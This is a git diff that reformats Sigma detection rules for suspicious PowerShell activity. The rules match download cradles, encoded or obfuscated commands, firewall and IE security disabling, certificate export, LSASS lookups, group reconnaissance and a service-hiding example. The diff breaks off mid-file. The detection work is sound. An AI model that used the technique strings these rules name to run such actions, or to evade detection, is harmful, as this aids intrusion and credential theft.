pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - \powershell_ise.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - 'Set-NetFirewallProfile ' - ' -Enabled ' - ' False' selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -All ' - Public - Domain diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml index 09fcad18f..b6f03b3f1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_ie_features.yml @@ -1,8 +1,7 @@ title: Disabled IE Security Features id: fb50eb7a-5ab1-43ae-bcc9-091818cb8424 status: test -description: Detects command lines that indicate unwanted modifications to registry - keys that disable important Internet Explorer security features +description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features references: - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ author: Florian Roth (Nextron Systems) @@ -20,15 +19,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name IEHarden ' - ' -value 0 ' selection2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name DEPOff ' - ' -value 1 ' selection3: - CommandLine|contains|all: + CommandLine|contains|all: - ' -name DisableFirstRunCustomize ' - ' -value 2 ' condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml index 812591adc..aa19745c4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_dll_execution.yml @@ -1,8 +1,7 @@ title: Potential PowerShell Execution Via DLL id: 6812a10b-60ea-420c-832f-dfcc33b646ba status: test -description: Detects potential PowerShell execution from a DLL instead of the usual - PowerShell process as seen used in PowerShdll +description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll references: - https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md author: Markus Neis, Nasreddine Bencherchali @@ -20,18 +19,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \rundll32.exe - - \regsvcs.exe - - \InstallUtil.exe - - \regasm.exe - - OriginalFileName: - - RUNDLL32.EXE - - RegSvcs.exe - - InstallUtil.exe - - RegAsm.exe + - Image|endswith: + - \rundll32.exe + - \regsvcs.exe + - \InstallUtil.exe + - \regasm.exe + - OriginalFileName: + - RUNDLL32.EXE + - RegSvcs.exe + - InstallUtil.exe + - RegAsm.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Default.GetString - FromBase64String - Invoke-Expression diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml index 17d2a51f5..3b33e274c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_downgrade_attack.yml @@ -1,11 +1,10 @@ title: Potential PowerShell Downgrade Attack id: b3512211-c67e-4707-bedc-66efc7848863 related: - - id: 6331d09b-4785-4c13-980f-f96661356249 - type: derived + - id: 6331d09b-4785-4c13-980f-f96661356249 + type: derived status: test -description: Detects PowerShell downgrade attack by comparing the host versions with - the actually used engine version 2.0 +description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 references: - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade- @@ -26,7 +25,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \powershell.exe - CommandLine|contains: + CommandLine|contains: - ' -version 2 ' - ' -versio 2 ' - ' -versi 2 ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml index 9c0788e05..71ea4581f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_com_cradles.yml @@ -1,11 +1,10 @@ title: Potential COM Objects Download Cradles Usage - Process Creation id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf related: - - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe - type: similar + - id: 3c7d1587-3b13-439f-9941-7d14313dbdfe + type: similar status: test -description: Detects usage of COM objects that can be abused to download files in - PowerShell by CLSID +description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID references: - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0 - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 @@ -23,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: '[Type]::GetTypeFromCLSID(' + CommandLine|contains: '[Type]::GetTypeFromCLSID(' selection_2: - CommandLine|contains: + CommandLine|contains: - 0002DF01-0000-0000-C000-000000000046 - F6D90F16-9C73-11D3-B32E-00C04F990BB4 - F5078F35-C551-11D3-89B9-0000F81FE221 diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml index 889a2cb7e..339e1b748 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_cradles.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - .DownloadString( - .DownloadFile( - 'Invoke-WebRequest ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml index d452d355e..a96c5e33a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_dll.yml @@ -1,8 +1,7 @@ title: Potential DLL File Download Via PowerShell Invoke-WebRequest id: 0f0450f3-8b47-441e-a31b-15a91dc243e2 status: experimental -description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest - cmdlet +description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Florian Roth (Nextron Systems), Hieu Tran @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - 'Invoke-WebRequest ' - 'IWR ' - CommandLine|contains|all: + CommandLine|contains|all: - http - OutFile - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml index 70551f157..489c85219 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_iex.yml @@ -20,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_download: - CommandLine|contains: + CommandLine|contains: - .DownloadString( - .DownloadFile( - 'Invoke-WebRequest ' - 'iwr ' selection_iex: - CommandLine|contains: + CommandLine|contains: - ;iex $ - '| IEX' - '|IEX ' @@ -39,7 +39,6 @@ detection: - Invoke-Expression condition: process_creation and (all of selection_*) falsepositives: - - Some PowerShell installers were seen using similar combinations. Apply filters - accordingly + - Some PowerShell installers were seen using similar combinations. Apply filters accordingly level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml index 11c1b1c4c..d96b3351d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_download_patterns.yml @@ -1,11 +1,10 @@ title: PowerShell Download Pattern id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 related: - - id: e6c54d94-498c-4562-a37c-b469d8e9a275 - type: derived + - id: e6c54d94-498c-4562-a37c-b469d8e9a275 + type: derived status: test -description: Detects a Powershell process that contains download commands in its command - line string +description: Detects a Powershell process that contains download commands in its command line string author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2019/01/16 modified: 2023/01/26 @@ -21,18 +20,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - new-object - net.webclient). - download - CommandLine|contains: + CommandLine|contains: - string( - file( condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml index 6a63adfde..040100798 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_email_exfil.yml @@ -21,7 +21,7 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains|all: + CommandLine|contains|all: - Add-PSSnapin - Get-Recipient - -ExpandProperty diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml index c1e2f427a..c11a889e5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml @@ -1,16 +1,12 @@ title: Potential Suspicious Windows Feature Enabled - ProcCreation id: c740d4cf-a1e9-41de-bb16-8a46a4f57918 related: - - id: 55c925c1-7195-426b-a136-a9396800e29b - type: similar + - id: 55c925c1-7195-426b-a136-a9396800e29b + type: similar status: test -description: 'Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" - used as a Deployment Image Servicing and Management tool. - - Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, - and update features and packages in Windows images - - ' +description: | + Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. + Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system @@ -28,12 +24,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - Enable-WindowsOptionalFeature - -Online - -FeatureName selection_feature: - CommandLine|contains: + # Add any insecure/unusual windows features that you don't use in your environment + CommandLine|contains: - TelnetServer - Internet-Explorer-Optional-amd64 - TFTP diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml index a9a01d6a4..e90b89999 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encode.yml @@ -24,14 +24,14 @@ detection: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' -en ' - ' -enc ' - ' -enco' - ' -ec ' filter_encoding: - CommandLine|contains: ' -Encoding ' + CommandLine|contains: ' -Encoding ' filter_azure: ParentImage|contains: - C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml index 03d1801a4..58a212c5d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Encoded Command Patterns id: b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c status: test -description: Detects PowerShell command line patterns in combincation with encoded - commands that often appear in malware infection chains +description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains references: - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/ author: Florian Roth (Nextron Systems) @@ -20,20 +19,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.Exe - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.Exe + - pwsh.dll selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' -en ' - ' -enc ' - ' -enco' selection_encoded: - CommandLine|contains: + CommandLine|contains: - ' JAB' - ' SUVYI' - ' SQBFAFgA' @@ -47,7 +46,6 @@ detection: - \gc_worker.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Other tools that work with encoded scripts in the command line instead of script - files + - Other tools that work with encoded scripts in the command line instead of script files level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml index 206fd570b..7bd5af23a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoded_obfusc.yml @@ -1,8 +1,7 @@ title: Suspicious Obfuscated PowerShell Code id: 8d01b53f-456f-48ee-90f6-bc28e67d4e35 status: test -description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell - code often used in command lines +description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines references: - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/ author: Florian Roth (Nextron Systems) @@ -19,13 +18,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # -bxor 0x - IAAtAGIAeABvAHIAIAAwAHgA - AALQBiAHgAbwByACAAMAB4A - gAC0AYgB4AG8AcgAgADAAeA + # .Invoke() | - AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg - AuAEkAbgB2AG8AawBlACgAKQAgAHwAI - ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC + # {1}{0}" -f + # {0}{3}" -f + # {2}{0}" -f - AHsAMQB9AHsAMAB9ACIAIAAtAGYAI - B7ADEAfQB7ADAAfQAiACAALQBmAC - AewAxAH0AewAwAH0AIgAgAC0AZgAg @@ -35,6 +39,9 @@ detection: - AHsAMgB9AHsAMAB9ACIAIAAtAGYAI - B7ADIAfQB7ADAAfQAiACAALQBmAC - AewAyAH0AewAwAH0AIgAgAC0AZgAg + # {1}{0}' -f + # {0}{3}' -f + # {2}{0}' -f - AHsAMQB9AHsAMAB9ACcAIAAtAGYAI - B7ADEAfQB7ADAAfQAnACAALQBmAC - AewAxAH0AewAwAH0AJwAgAC0AZgAg diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml index bd8b7309a..8f945dea0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_encoding_patterns.yml @@ -1,11 +1,10 @@ title: Potential Encoded PowerShell Patterns In CommandLine id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: similar + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: similar status: test -description: Detects specific combinations of encoding methods in PowerShell via the - commandline +description: Detects specific combinations of encoding methods in PowerShell via the commandline references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton @@ -25,14 +24,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_to_1: - CommandLine|contains: + CommandLine|contains: - ToInt - ToDecimal - ToByte @@ -40,20 +39,19 @@ detection: - ToSingle - ToSByte selection_to_2: - CommandLine|contains: + CommandLine|contains: - ToChar - ToString - String selection_gen_1: - CommandLine|contains|all: + CommandLine|contains|all: - char - join selection_gen_2: - CommandLine|contains|all: + CommandLine|contains|all: - split - join - condition: process_creation and (selection_img and (all of selection_to_* or 1 - of selection_gen_*)) + condition: process_creation and (selection_img and (all of selection_to_* or 1 of selection_gen_*)) falsepositives: - Unknown level: low diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml index 0d4ca7054..897a4e2c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_exec_data_file.yml @@ -18,18 +18,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_exec: - CommandLine|contains: + CommandLine|contains: - 'iex ' - 'Invoke-Expression ' - 'Invoke-Command ' - 'icm ' selection_read: - CommandLine|contains: + CommandLine|contains: - 'cat ' - 'get-content ' - 'type ' selection_raw: - CommandLine|contains: ' -raw' + CommandLine|contains: ' -raw' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml index ede811e7d..f7ddc96a8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_export_certificate.yml @@ -1,12 +1,10 @@ title: Certificate Exported Via PowerShell id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb related: - - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c - type: similar + - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c + type: similar status: experimental -description: Detects calls to cmdlets that are used to export certificates from the - local certificate store. Threat actors were seen abusing this to steal private - keys from compromised machines. +description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate @@ -27,12 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - 'Export-PfxCertificate ' - 'Export-Certificate ' condition: process_creation and selection falsepositives: - - Legitimate certificate exports by administrators. Additional filters might be - required. + - Legitimate certificate exports by administrators. Additional filters might be required. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml index 63e8fdf3e..6e8972b1d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string.yml @@ -1,8 +1,7 @@ title: Base64 Encoded PowerShell Command Detected id: e32d4572-9826-4738-b651-95fa63747e8a status: test -description: Detects usage of the "FromBase64String" function in the commandline which - is used to decode a base64 encoded string +description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string references: - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ::FromBase64String( + CommandLine|contains: ::FromBase64String( condition: process_creation and selection falsepositives: - Administrative script libraries diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml index 17a9c10c4..4ee423b6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_frombase64string_archive.yml @@ -1,11 +1,10 @@ title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f related: - - id: df69cb1d-b891-4cd9-90c7-d617d90100ce - type: similar + - id: df69cb1d-b891-4cd9-90c7-d617d90100ce + type: similar status: test -description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This - technique is often used as a method to load malicious content into memory afterward. +description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 author: frack113 @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - FromBase64String - MemoryStream - H4sI diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml index 31d8aaaed..22065771e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_clipboard.yml @@ -1,8 +1,8 @@ title: PowerShell Get-Clipboard Cmdlet Via CLI id: b9aeac14-2ffd-4ad3-b967-1354a4e628c3 related: - - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 - type: derived + - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 + type: derived status: test description: Detects usage of the 'Get-Clipboard' cmdlet via CLI references: @@ -23,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: Get-Clipboard + CommandLine|contains: Get-Clipboard condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml index 1d6ca447e..023dc04e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml @@ -1,11 +1,10 @@ title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet id: c8a180d6-47a3-4345-a609-53f9c3d834fc related: - - id: cef24b90-dddc-4ae1-a09a-8764872f69fc - type: similar + - id: cef24b90-dddc-4ae1-a09a-8764872f69fc + type: similar status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using the PowerShell Get-LocalGroupMember Cmdlet +description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,21 +17,23 @@ logsource: category: process_creation product: windows detection: + # Covers group and localgroup flags process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmdlet: - CommandLine|contains: 'Get-LocalGroupMember ' + CommandLine|contains: 'Get-LocalGroupMember ' selection_group: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml index 9ef5cbeb7..fd52aeb07 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_getprocess_lsass.yml @@ -1,8 +1,7 @@ title: PowerShell Get-Process LSASS id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349 status: test -description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which - is in almost all cases a sign of malicious activity +description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 author: Florian Roth (Nextron Systems) @@ -20,7 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # You can add more permutation as you see fit - Get-Process lsas - ps lsas - gps lsas diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml index 5a626b3e0..c6b85b0ef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml @@ -1,8 +1,7 @@ title: Malicious Base64 Encoded PowerShell Keywords in Command Lines id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0 status: test -description: Detects base64 encoded strings used in hidden malicious PowerShell command - lines +description: Detects base64 encoded strings used in hidden malicious PowerShell command lines references: - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/ author: John Lambert (rule) @@ -20,16 +19,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_hidden: - CommandLine|contains: ' hidden ' + CommandLine|contains: ' hidden ' selection_encoded: - CommandLine|contains: + CommandLine|contains: - AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA - aXRzYWRtaW4gL3RyYW5zZmVy - IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml index ed3496ccf..837023641 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml @@ -1,14 +1,12 @@ title: Abuse of Service Permissions to Hide Services Via Set-Service id: 514e4c3a-c77d-4cde-a00f-046425e2301e related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: derived - - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 + type: derived + - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 @@ -28,14 +26,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - Image|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl: - CommandLine|contains|all: + # Example would be: "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" + CommandLine|contains|all: - 'Set-Service ' - DCLCWPDTSD selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml index 05e3ca71a..a6f250b04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_iex_patterns.yml +++ 